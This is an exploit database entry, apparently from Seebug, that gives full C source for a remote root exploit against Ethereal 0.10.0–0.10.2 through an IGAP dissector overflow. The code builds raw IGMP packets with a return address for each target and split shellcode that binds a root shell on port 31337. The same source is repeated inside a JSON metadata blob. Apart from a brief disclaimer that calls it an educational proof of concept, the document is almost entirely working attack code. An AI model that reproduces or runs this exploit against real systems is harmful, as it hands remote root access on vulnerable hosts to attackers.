ID SSV:8595
Type seebug
Reporter Root
Modified 2008-06-05T00:00:00
Description
No description provided by source.
/*
* THE EYE ON SECURITY RESEARCH GROUP - INDIA
* Ethereal IGAP Dissector Message Overflow Remote Root exploit
*
* Copyright 2004 - EOS-India Group
*
* Authors note:
* Shellcode splitting technique:
* Due to difficulty involved while following normal exploitation techniques due to shortage of memory space
* for our shellcode, we used the technique of shellcode splitting. In this technique one part of the shellcode
* is kept before the buffer which overwrites the saved EIP on stack followed by a jmp OFFSET instruction which
* jumps EIP to the second half of the shellcode which is kept after return address. Also since our shellcode
* requires EBP to contain a usuable stack address, we overwrite saved EBP also.
*
* Disclaimer:
* This code is for educational purpose and testing only. The Eye on Security Research Group - India, cannot
* be held responsible for any damage caused due to misuse of this code.
* This code is a proof of concept exploit for a serious vulnerability that exists in Ethereal 0.10.0 to
* Ethereal 0.10.2.
*
* Nilanjan De [n2n+linuxmail.org] - Abhisek Datta [abhisek+front.ru]
* http://www.eos-india.net
*
*/
#define IPPROTO_IGAP 0x02 // IPPROTO_IGMP=0x02
#define PAYLOAD_SIZE (255-64)
#define MAX_BUFF sizeof(struct igap_header)+sizeof(struct ipheader)
#define EXP "Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow Exploit"
#define VER "0.2"
#define SOCKET_ERROR -1
#define MAX_PACKET 10
#define RETOFFSET 76
#define SRC_IP "192.31.33.7"
#include <stdio.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#define MAX_ARCH 5
struct eos{
char *arch;
unsigned long ret;
} targets[] = {
"tEthereal(0.10.2)-Gentoo(gdb)",
0xbffede50,
//-------------------------------
"tEthereal(0.10.2)-Gentoo ",
0xbffede10,
//-------------------------------
"Ethereal(0.10.2)-Gentoo ",
0xbfffd560,
//-------------------------------
"tEthereal(0.10.2)-RedHat 8 ",
0xbffedfb8,
//-------------------------------
"Ethereal(0.10.2)-RedHat 8 ",
0xbfffcd08,
//-------------------------------
NULL,
0
};
/*
x86 linux portbind a shell in port 31337
based on shellcode from www.shellcode.com.ar
with a few modifications by us
*/
char shellcode_firsthalf[]=
/* sys_fork() */
"\x31\xc0" // xorl %eax,%eax
"\x31\xdb" // xorl %ebx,%ebx
"\xb0\x02" // movb $0x2,%al
"\xcd\x80" // int $0x80
"\x38\xc3" // cmpl %ebx,%eax
"\x74\x05" // je 0x5
/* sys_exit() */
"\x8d\x43\x01" // leal 0x1(%ebx),%eax
"\xcd\x80" // int $0x80
/* setuid(0) */
"\x31\xc0" // xorl %eax,%eax
"\x31\xdb" // xorl %ebx,%ebx
"\xb0\x17" // movb $0x17,%al
"\xcd\x80" // int $0x80
/* socket() */
"\x31\xc0" // xorl %eax,%eax
"\x89\x45\x10" // movl %eax,0x10(%ebp)(IPPROTO_IP = 0x0)
"\x40" // incl %eax
"\x89\xc3" // movl %eax,%ebx(SYS_SOCKET = 0x1)
"\x89\x45\x0c" // movl %eax,0xc(%ebp)(SOCK_STREAM = 0x1)
"\x40" // incl %eax
"\x89\x45\x08" // movl %eax,0x8(%ebp)(AF_INET = 0x2)
"\x8d\x4d\x08" // leal 0x8(%ebp),%ecx
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
"\x89\x45\x08" // movl %eax,0x8(%ebp)
;
char jumpcode[]="\xeb\x10";
char shellcode_secondhalf[]=
/* bind()*/
"\x43" // incl %ebx(SYS_BIND = 0x2)
"\x66\x89\x5d\x14" // movw %bx,0x14(%ebp)(AF_INET = 0x2)
"\x66\xc7\x45\x16\x7a\x69" // movw $0x697a,0x16(%ebp)(port=31337)
"\x31\xd2" // xorl %edx,%edx
"\x89\x55\x18" // movl %edx,0x18(%ebp)
"\x8d\x55\x14" // leal 0x14(%ebp),%edx
"\x89\x55\x0c" // movl %edx,0xc(%ebp)
"\xc6\x45\x10\x10" // movb $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
/* listen() */
"\x40" // incl %eax
"\x89\x45\x0c" // movl %eax,0xc(%ebp)
"\x43" // incl %ebx
"\x43" // incl %ebx(SYS_LISTEN = 0x4)
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
/* accept() */
"\x43" // incl %ebx
"\x89\x45\x0c" // movl %eax,0xc(%ebp)
"\x89\x45\x10" // movl %eax,0x10(%ebp)
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
"\x89\xc3" // movl %eax,%ebx
/* dup2() */
"\x31\xc9" // xorl %ecx,%ecx
"\xb0\x3f" // movb $0x3f,%al
"\xcd\x80" // int $0x80
"\x41" // incl %ecx
"\x80\xf9\x03" // cmpb $0x3,%cl
"\x75\xf6" // jne -0xa
/* execve() */
"\x31\xd2" // xorl %edx,%edx
"\x52" // pushl %edx
"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
"\x89\xe3" // movl %esp,%ebx
"\x52" // pushl %edx
"\x53" // pushl %ebx
"\x89\xe1" // movl %esp,%ecx
"\xb0\x0b" // movb $0xb,%al
"\xcd\x80"; // int $0x80
struct ipheader {
unsigned char ip_hl:4, ip_v:4;
unsigned char ip_tos;
unsigned short int ip_len;
unsigned short int ip_id;
unsigned short int ip_off;
unsigned char ip_ttl;
unsigned char ip_proto;
unsigned short int ip_sum;
unsigned int ip_src;
unsigned int ip_dst;
};
struct igap_header { // This is a malformed header which does not conforms with IGAP RFC
unsigned char igap_type; // Message Type
unsigned char igap_restime; // Response Time
unsigned short int igap_cksum; // IGAP Message Checksum
unsigned int igap_gaddr; // Group Address
unsigned char igap_ver; // Version
unsigned char igap_stype; // SubType
unsigned char igap_reserved1; // Reserved
unsigned char igap_cid; // Challenge ID
unsigned char igap_asize; // Account Size
unsigned char igap_msgsize; // Message Size
unsigned short int igap_reserved2; // Reserved
/*
unsigned char igap_uaccount[16];// User Account
unsigned char igap_message[64] // Message
*/
unsigned char igap_payload[16+64+PAYLOAD_SIZE];
// This buffer will contain payload, here we differ from RFC by sending a bigger message.
};
unsigned short checksum(unsigned short *buf,int nwords)
{
unsigned long sum;
for (sum = 0; nwords > 0; nwords--)
sum += *(buf)++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}
void showhelp(char *pr00gie) {
int i=0;
printf("######### The Eye on Security Research Group - India ########\n");
printf("%s %s\n",EXP,VER);
printf("abhisek[at]front[dot]ru - n2n[at]linuxmail[dot]org\n");
printf("http://www.eos-india.net\n\n");
printf("[usage]\n");
printf("%s [Remote Host] [Target]\n",pr00gie);
printf("[Available Targets]\n");
while(targets[i].arch != NULL) {
printf("%d. - %s\t - %p\n",(i),targets[i].arch,targets[i].ret);
i++;
}
exit(1);
}
int main(int argc,char *argv[]) {
char buffer[MAX_BUFF];
struct ipheader *iphdr=(struct ipheader*)buffer;
struct igap_header *igaphdr=(struct igap_header*)(buffer+sizeof(struct ipheader));
int sockfd;
unsigned long addr;
int one=1;
int i;
const int *val=&one;
struct sockaddr_in sin;
unsigned long magic;
unsigned int n;
if(getuid()) {
printf("- This code opens SOCK_RAW which needs root privilege\n");
exit(1);
}
if(argc != 3)
showhelp(argv[0]);
n=atoi(argv[2]);
if(n >= MAX_ARCH) {
printf("- Invalid target\n");
showhelp(argv[0]);
}
magic=targets[n].ret;
printf("-Using RET %p\n",magic);
addr=inet_addr(argv[1]);
if(addr==INADDR_NONE) {
printf("- Invalid target\n");
exit(1);
}
sin.sin_addr.s_addr=addr;
sin.sin_family=AF_INET;
sin.sin_port=0x00;
sockfd=socket(PF_INET,SOCK_RAW,IPPROTO_RAW);
if(sockfd==SOCKET_ERROR) {
printf("- Failed creating SOCK_RAW descriptor\n");
exit(1);
}
if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one)) < 0)
printf ("- WARNING !! :Cannot set IP_HDRINCL!\n");
memset(buffer,0x00,MAX_BUFF);
// Filling IP Header
iphdr->ip_hl=0x05;
iphdr->ip_v=0x04;
iphdr->ip_tos=0x00;
iphdr->ip_len=MAX_BUFF;
iphdr->ip_id=htonl(54321);
iphdr->ip_off=0x00; // Lower 3 bit=Flag4Fragmentation - Higher 13 Bit=Fragment Offset
iphdr->ip_ttl=0x01;
iphdr->ip_proto=IPPROTO_IGAP; // IPPROTO_IGMP
iphdr->ip_sum=0x00; // Fill sum before sending packet
iphdr->ip_src=inet_addr (SRC_IP);
iphdr->ip_dst=addr;
// Filling IGAP Header
igaphdr->igap_type=0x41; // IGAP Membership Query
igaphdr->igap_restime=0x0a; //
igaphdr->igap_cksum=0x00; // compute before sending packet
igaphdr->igap_gaddr=0x00; // Ignored in IGAP Membership Query Message
igaphdr->igap_ver=0x01; // IGAPv1
igaphdr->igap_stype=0x21; // Basic Query
igaphdr->igap_reserved1=0x00; // Ignored
igaphdr->igap_cid=0x00;
// Challenge ID (ignored because Chanllenge Response authentication not used)
igaphdr->igap_asize=0x10; // MAX Size of Account Name Field
igaphdr->igap_msgsize=0x40+PAYLOAD_SIZE; // Size of Message
igaphdr->igap_reserved2=0x00; // Reserved
// Building exploit buffer
//for(i=0;i<16+64+PAYLOAD_SIZE;i++)
// memset(igaphdr->igap_payload+i,(unsigned char)i,1);
memset(igaphdr->igap_payload,0x90,16+64+PAYLOAD_SIZE);
memcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8,shellcode_firsthalf,
strlen(shellcode_firsthalf));
memcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4,jumpcode,strlen(jumpcode));
memcpy(igaphdr->igap_payload+16+64+RETOFFSET,&magic,4);
magic-=0x10;
memcpy(igaphdr->igap_payload+16+64+RETOFFSET-4,&magic,4);
memcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1,
shellcode_secondhalf,strlen(shellcode_secondhalf));
// Calculating checksum
igaphdr->igap_cksum=checksum((unsigned short*)(buffer+sizeof(struct ipheader)),
(sizeof(struct igap_header))>>1);
iphdr->ip_sum = checksum ((unsigned short*)buffer,(iphdr->ip_len)>>1);
// Sending
one=MAX_PACKET;
while(one) {
sendto(sockfd,buffer,MAX_BUFF,0,(struct sockaddr*)&sin,sizeof(sin));
printf(".");
one--;
}
close(sockfd);
printf("\n- Send %d packets to %s\n",MAX_PACKET,argv[1]);
printf("- Read source to know what to do to check if the exploit worked\n");
return 0;
}
{"sourceData": "\n /* \r\n * THE EYE ON SECURITY RESEARCH GROUP - INDIA\r\n * Ethereal IGAP Dissector Message Overflow Remote Root exploit\r\n *\r\n * Copyright 2004 - EOS-India Group\r\n *\r\n * Authors note:\r\n * Shellcode splitting technique:\r\n * Due to difficulty involved while following normal exploitation techniques due to shortage of memory space\r\n * for our shellcode, we used the technique of shellcode splitting. In this technique one part of the shellcode\r\n * is kept before the buffer which overwrites the saved EIP on stack followed by a jmp OFFSET instruction which\r\n * jumps EIP to the second half of the shellcode which is kept after return address. Also since our shellcode \r\n * requires EBP to contain a usuable stack address, we overwrite saved EBP also.\r\n *\r\n * Disclaimer:\r\n * This code is for educational purpose and testing only. The Eye on Security Research Group - India, cannot\r\n * be held responsible for any damage caused due to misuse of this code.\r\n * This code is a proof of concept exploit for a serious vulnerability that exists in Ethereal 0.10.0 to\r\n * Ethereal 0.10.2.\r\n *\r\n * Nilanjan De [n2n+linuxmail.org] - Abhisek Datta [abhisek+front.ru]\r\n * http://www.eos-india.net\r\n *\r\n*/\r\n#define IPPROTO_IGAP\t0x02 // IPPROTO_IGMP=0x02 \t\r\n#define PAYLOAD_SIZE\t(255-64)\t\r\n#define MAX_BUFF\tsizeof(struct igap_header)+sizeof(struct ipheader)\r\n#define EXP\t\t"Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow Exploit"\r\n#define VER\t\t"0.2"\r\n#define SOCKET_ERROR\t-1\r\n#define MAX_PACKET\t10\r\n#define RETOFFSET \t76 \r\n#define SRC_IP\t\t"192.31.33.7"\r\n#include <stdio.h>\r\n#include <signal.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <unistd.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n\r\n#define MAX_ARCH\t5\r\nstruct eos{\r\n\tchar *arch;\r\n\tunsigned long ret;\r\n} targets[] = {\r\n\t"tEthereal(0.10.2)-Gentoo(gdb)",\r\n\t0xbffede50,\r\n\t//-------------------------------\r\n\t"tEthereal(0.10.2)-Gentoo ",\r\n\t0xbffede10,\r\n\t//-------------------------------\r\n\t"Ethereal(0.10.2)-Gentoo ",\r\n\t0xbfffd560,\r\n\t//-------------------------------\r\n\t"tEthereal(0.10.2)-RedHat 8 ",\r\n\t0xbffedfb8,\r\n\t//-------------------------------\r\n\t"Ethereal(0.10.2)-RedHat 8 ",\r\n\t0xbfffcd08,\r\n\t//-------------------------------\r\n\tNULL,\r\n\t0\r\n};\r\n\t\r\n\r\n/*\r\n x86 linux portbind a shell in port 31337\r\n based on shellcode from www.shellcode.com.ar\r\n with a few modifications by us\r\n*/\r\n \r\nchar shellcode_firsthalf[]=\r\n /* sys_fork() */\r\n\t"\\x31\\xc0" // xorl %eax,%eax\r\n\t"\\x31\\xdb" // xorl %ebx,%ebx\r\n\t"\\xb0\\x02" // movb $0x2,%al\r\n\t"\\xcd\\x80" // int $0x80\r\n\t"\\x38\\xc3" // cmpl %ebx,%eax\r\n\t"\\x74\\x05" // je 0x5\r\n\t/* sys_exit() */\r\n\t"\\x8d\\x43\\x01" // leal 0x1(%ebx),%eax\r\n\t"\\xcd\\x80" // int $0x80\r\n /* setuid(0) */\r\n "\\x31\\xc0" // xorl %eax,%eax\r\n "\\x31\\xdb" // xorl %ebx,%ebx\r\n "\\xb0\\x17" // movb $0x17,%al\r\n "\\xcd\\x80" // int $0x80\r\n /* socket() */\r\n "\\x31\\xc0" // xorl %eax,%eax\r\n "\\x89\\x45\\x10" // movl %eax,0x10(%ebp)(IPPROTO_IP = 0x0)\r\n "\\x40" // incl %eax\r\n "\\x89\\xc3" // movl %eax,%ebx(SYS_SOCKET = 0x1)\r\n "\\x89\\x45\\x0c" // movl %eax,0xc(%ebp)(SOCK_STREAM = 0x1)\r\n "\\x40" // incl %eax\r\n "\\x89\\x45\\x08" // movl %eax,0x8(%ebp)(AF_INET = 0x2)\r\n\t"\\x8d\\x4d\\x08" // leal 0x8(%ebp),%ecx\r\n "\\xb0\\x66" // movb $0x66,%al\r\n "\\xcd\\x80" // int $0x80\r\n "\\x89\\x45\\x08" // movl %eax,0x8(%ebp)\r\n\t;\t\r\nchar jumpcode[]="\\xeb\\x10";\r\n\r\nchar shellcode_secondhalf[]=\r\n /* bind()*/\r\n "\\x43" // incl %ebx(SYS_BIND = 0x2)\r\n "\\x66\\x89\\x5d\\x14" // movw %bx,0x14(%ebp)(AF_INET = 0x2)\r\n\t"\\x66\\xc7\\x45\\x16\\x7a\\x69" // movw $0x697a,0x16(%ebp)(port=31337)\r\n "\\x31\\xd2" // xorl %edx,%edx\r\n "\\x89\\x55\\x18" // movl %edx,0x18(%ebp)\r\n "\\x8d\\x55\\x14" // leal 0x14(%ebp),%edx\r\n "\\x89\\x55\\x0c" // movl %edx,0xc(%ebp)\r\n "\\xc6\\x45\\x10\\x10" // movb $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)\r\n "\\xb0\\x66" // movb $0x66,%al\r\n "\\xcd\\x80" // int $0x80\r\n \r\n /* listen() */\r\n "\\x40" // incl %eax\r\n "\\x89\\x45\\x0c" // movl %eax,0xc(%ebp)\r\n "\\x43" // incl %ebx\r\n "\\x43" // incl %ebx(SYS_LISTEN = 0x4)\r\n "\\xb0\\x66" // movb $0x66,%al\r\n "\\xcd\\x80" // int $0x80\r\n \r\n /* accept() */\r\n "\\x43" // incl %ebx\r\n "\\x89\\x45\\x0c" // movl %eax,0xc(%ebp)\r\n "\\x89\\x45\\x10" // movl %eax,0x10(%ebp)\r\n "\\xb0\\x66" // movb $0x66,%al\r\n "\\xcd\\x80" // int $0x80\r\n "\\x89\\xc3" // movl %eax,%ebx\r\n \r\n /* dup2() */\r\n "\\x31\\xc9" // xorl %ecx,%ecx\r\n "\\xb0\\x3f" // movb $0x3f,%al\r\n "\\xcd\\x80" // int $0x80\r\n "\\x41" // incl %ecx\r\n "\\x80\\xf9\\x03" // cmpb $0x3,%cl\r\n "\\x75\\xf6" // jne -0xa\r\n \r\n /* execve() */\r\n "\\x31\\xd2" // xorl %edx,%edx\r\n "\\x52" // pushl %edx\r\n "\\x68\\x6e\\x2f\\x73\\x68" // pushl $0x68732f6e\r\n "\\x68\\x2f\\x2f\\x62\\x69" // pushl $0x69622f2f\r\n "\\x89\\xe3" // movl %esp,%ebx\r\n "\\x52" // pushl %edx\r\n "\\x53" // pushl %ebx\r\n "\\x89\\xe1" // movl %esp,%ecx\r\n "\\xb0\\x0b" // movb $0xb,%al\r\n "\\xcd\\x80"; // int $0x80\r\n \r\nstruct ipheader {\r\n\tunsigned char ip_hl:4, ip_v:4; \r\n\tunsigned char ip_tos;\r\n\tunsigned short int ip_len;\r\n\tunsigned short int ip_id;\r\n\tunsigned short int ip_off;\r\n\tunsigned char ip_ttl;\r\n\tunsigned char ip_proto;\r\n\tunsigned short int ip_sum;\r\n\tunsigned int ip_src;\r\n\tunsigned int ip_dst;\r\n};\r\n\r\nstruct igap_header { \t\t// This is a malformed header which does not conforms with IGAP RFC\r\n\tunsigned char igap_type; \t// Message Type\r\n\tunsigned char igap_restime; \t// Response Time\r\n\tunsigned short int igap_cksum; \t// IGAP Message Checksum\r\n\tunsigned int igap_gaddr; \t// Group Address\r\n\tunsigned char igap_ver; \t// Version\r\n\tunsigned char igap_stype;\t// SubType\r\n\tunsigned char igap_reserved1;\t// Reserved\r\n\tunsigned char igap_cid;\t\t// Challenge ID\r\n\tunsigned char igap_asize;\t// Account Size\r\n\tunsigned char igap_msgsize;\t// Message Size\r\n\tunsigned short int igap_reserved2;\t// Reserved\r\n\t/*\r\n\tunsigned char igap_uaccount[16];// User Account\r\n\tunsigned char igap_message[64]\t// Message\r\n\t*/\r\n\tunsigned char igap_payload[16+64+PAYLOAD_SIZE];\t\r\n// This buffer will contain payload, here we differ from RFC by sending a bigger message.\r\n};\r\n\r\nunsigned short checksum(unsigned short *buf,int nwords)\r\n{\r\n\tunsigned long sum;\r\n\tfor (sum = 0; nwords > 0; nwords--)\r\n\t\tsum += *(buf)++;\r\n\tsum = (sum >> 16) + (sum & 0xffff);\r\n\tsum += (sum >> 16);\r\n\treturn ~sum;\r\n}\r\n\r\nvoid showhelp(char *pr00gie) {\r\n\tint i=0;\r\n\tprintf("######### The Eye on Security Research Group - India ########\\n");\r\n\tprintf("%s %s\\n",EXP,VER);\r\n \tprintf("abhisek[at]front[dot]ru - n2n[at]linuxmail[dot]org\\n");\r\n \tprintf("http://www.eos-india.net\\n\\n");\r\n\tprintf("[usage]\\n");\r\n\tprintf("%s [Remote Host] [Target]\\n",pr00gie);\r\n\tprintf("[Available Targets]\\n");\r\n\twhile(targets[i].arch != NULL) {\r\n\t\tprintf("%d. - %s\\t - %p\\n",(i),targets[i].arch,targets[i].ret);\r\n\t\ti++;\r\n\t}\r\n\texit(1); \r\n}\r\n\t \r\nint main(int argc,char *argv[]) {\r\n\tchar buffer[MAX_BUFF];\r\n\tstruct ipheader *iphdr=(struct ipheader*)buffer;\r\n\tstruct igap_header *igaphdr=(struct igap_header*)(buffer+sizeof(struct ipheader));\r\n\tint sockfd;\r\n\tunsigned long addr;\r\n\tint one=1;\r\n\tint i;\r\n\tconst int *val=&one;\r\n\tstruct sockaddr_in sin;\r\n\tunsigned long magic;\r\n\tunsigned int n;\r\n\t\r\n\tif(getuid()) {\r\n\t\tprintf("- This code opens SOCK_RAW which needs root privilege\\n");\r\n\t\texit(1);\r\n\t}\r\n\tif(argc != 3)\r\n\t\tshowhelp(argv[0]);\r\n\tn=atoi(argv[2]);\r\n\tif(n >= MAX_ARCH) {\r\n\t\tprintf("- Invalid target\\n");\r\n\t\tshowhelp(argv[0]);\r\n\t}\r\n\tmagic=targets[n].ret;\r\n\tprintf("-Using RET %p\\n",magic);\r\n\taddr=inet_addr(argv[1]);\r\n\tif(addr==INADDR_NONE) {\r\n\t\tprintf("- Invalid target\\n");\r\n\t\texit(1);\r\n\t}\r\n\tsin.sin_addr.s_addr=addr;\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=0x00;\r\n\tsockfd=socket(PF_INET,SOCK_RAW,IPPROTO_RAW);\r\n\tif(sockfd==SOCKET_ERROR) {\r\n\t\tprintf("- Failed creating SOCK_RAW descriptor\\n");\r\n\t\texit(1);\r\n\t}\r\n\tif(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one)) < 0)\r\n\t\tprintf ("- WARNING !! :Cannot set IP_HDRINCL!\\n");\r\n\tmemset(buffer,0x00,MAX_BUFF);\r\n\t// Filling IP Header\r\n\tiphdr->ip_hl=0x05;\r\n\tiphdr->ip_v=0x04;\r\n\tiphdr->ip_tos=0x00;\r\n\tiphdr->ip_len=MAX_BUFF;\r\n\tiphdr->ip_id=htonl(54321);\r\n\tiphdr->ip_off=0x00; // Lower 3 bit=Flag4Fragmentation - Higher 13 Bit=Fragment Offset\r\n\tiphdr->ip_ttl=0x01;\r\n\tiphdr->ip_proto=IPPROTO_IGAP; // IPPROTO_IGMP\r\n\tiphdr->ip_sum=0x00; // Fill sum before sending packet\r\n\tiphdr->ip_src=inet_addr (SRC_IP); \r\n\tiphdr->ip_dst=addr;\r\n\t// Filling IGAP Header\r\n\tigaphdr->igap_type=0x41; // IGAP Membership Query\r\n\tigaphdr->igap_restime=0x0a; // \r\n\tigaphdr->igap_cksum=0x00; // compute before sending packet\r\n\tigaphdr->igap_gaddr=0x00; // Ignored in IGAP Membership Query Message\r\n\tigaphdr->igap_ver=0x01; // IGAPv1\r\n\tigaphdr->igap_stype=0x21; // Basic Query\r\n\tigaphdr->igap_reserved1=0x00; // Ignored\r\n\tigaphdr->igap_cid=0x00; \r\n\t// Challenge ID (ignored because Chanllenge Response authentication not used)\t\t\r\n\tigaphdr->igap_asize=0x10; // MAX Size of Account Name Field\r\n\tigaphdr->igap_msgsize=0x40+PAYLOAD_SIZE; // Size of Message\t\r\n\tigaphdr->igap_reserved2=0x00; // Reserved\r\n\t// Building exploit buffer\r\n\t//for(i=0;i<16+64+PAYLOAD_SIZE;i++)\r\n\t//\tmemset(igaphdr->igap_payload+i,(unsigned char)i,1);\r\n\tmemset(igaphdr->igap_payload,0x90,16+64+PAYLOAD_SIZE);\r\n\tmemcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8,shellcode_firsthalf,\r\n\tstrlen(shellcode_firsthalf));\r\n\tmemcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4,jumpcode,strlen(jumpcode));\r\n\tmemcpy(igaphdr->igap_payload+16+64+RETOFFSET,&magic,4);\r\n\tmagic-=0x10;\r\n\tmemcpy(igaphdr->igap_payload+16+64+RETOFFSET-4,&magic,4);\r\n\tmemcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1,\r\n shellcode_secondhalf,strlen(shellcode_secondhalf));\r\n\t// Calculating checksum\r\n\tigaphdr->igap_cksum=checksum((unsigned short*)(buffer+sizeof(struct ipheader)),\r\n\t(sizeof(struct igap_header))>>1);\r\n\tiphdr->ip_sum = checksum ((unsigned short*)buffer,(iphdr->ip_len)>>1);\r\n\t// Sending\r\n\tone=MAX_PACKET;\r\n\twhile(one) {\r\n\t\tsendto(sockfd,buffer,MAX_BUFF,0,(struct sockaddr*)&sin,sizeof(sin));\r\n\t\tprintf(".");\r\n\t\tone--;\r\n\t}\r\n\tclose(sockfd); \r\n\tprintf("\\n- Send %d packets to %s\\n",MAX_PACKET,argv[1]);\t\r\n\tprintf("- Read source to know what to do to check if the exploit worked\\n");\r\n\treturn 0;\r\n}\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-8595", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-8595", "type": "seebug", "viewCount": 3, "references": [], "lastseen": "2017-11-19T21:40:37", "published": "2008-06-05T00:00:00", "cvelist": [], "id": "SSV:8595", "enchantments_done": [], "modified": "2008-06-05T00:00:00", "title": "Ethereal 0.10.0-0.10.2 IGAP Overflow Remote Root Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2017-11-19T21:40:37", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T21:40:37", "rev": 2}, "vulnersScore": 0.5}}
{}
